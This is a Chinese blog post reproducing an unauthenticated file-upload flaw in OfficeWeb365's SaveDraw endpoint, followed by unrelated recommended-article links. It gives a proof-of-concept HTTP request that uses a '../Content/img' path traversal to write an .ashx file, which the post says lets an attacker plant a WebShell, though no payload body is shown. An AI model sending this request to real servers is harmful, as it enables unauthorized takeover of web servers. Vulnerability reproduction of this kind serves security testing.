OfficeWeb365 SaveDraw 文件上传漏洞复现
发布日期:2025-04-27 23:09:28
浏览次数:17
分类:精选文章
本文共 700 字,大约阅读时间需要 2 分钟。
OfficeWeb365 SaveDraw接口漏洞分析
产品简介
OfficeWeb365 是一款专注于 Office 文档在线预览及 PDF 文档在线预览的云服务平台。其主要功能包括 Microsoft Word、Excel、PowerPoint 文档的在线预览,以及 WPS 文字处理、表格和演示文档的支持,同时还支持 Adobe PDF 文档的在线预览。
漏洞概述
在此次安全评估中,我们发现 OfficeWeb365 平台的 SaveDraw 接口存在严重的安全漏洞。该漏洞允许攻击者通过未授权的文件上传操作,将 WebShell 代码直接上传到服务器上,从而获取完整的服务器权限,进而对整个 Web 服务器 进行控制。
漏洞复现环境
为了验证该漏洞的存在,我们构建了以下复现环境:
- 目标 URL:
http://target-server/pw/savedraw - 请求参数:通过 POST 方法传递路径参数和索引值
- 用户代理:模拟标准浏览器环境
漏洞复现
以下是漏洞的 Proof of Concept(PoC)代码示例:
POST /PW/SaveDraw?path=../Content/img&idx=qwe.ashx HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0 Safari/537.36
注意事项
在进行安全测试之前,请确保您有权访问目标服务器并了解其安全策略。
发表评论
最新留言
能坚持,总会有不一样的收获!
[***.219.124.196]2026年06月14日 00时59分41秒
关于作者
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!
推荐文章
pip 安装出现异常
2023-03-02
Pip 安装失败:需要 SSL
2023-03-02
Pip 安装挂起
2023-03-02
pip 或 pip3 为 Python 3 安装包?
2023-03-02
pip 无法从 requirements.txt 安装软件包
2023-03-02
pip/pip3更换国内源
2023-03-02
pip3 install PyQt5 --user 失败
2023-03-02
pip3命令全解析:Python3包管理工具的详细使用指南
2023-03-02
PIPE 接口信号列表
2023-03-02
pipeline配置与管理Job企业级实战
2023-03-02
pipeline项目配置实战
2023-03-02
Pipenv 与 Conda?
2023-03-02
QVGA/HVGA/WVGA/FWVGA分辨率屏含义及大小//Android虚拟机分辨率
2023-03-02
pipy国内镜像的网址
2023-03-02
quiver绘制python语言
2023-03-02
pip下载缓慢
2023-03-02
PIP使用SSH从BitBucket安装自定义软件包,无需输入SSH密码
2023-03-02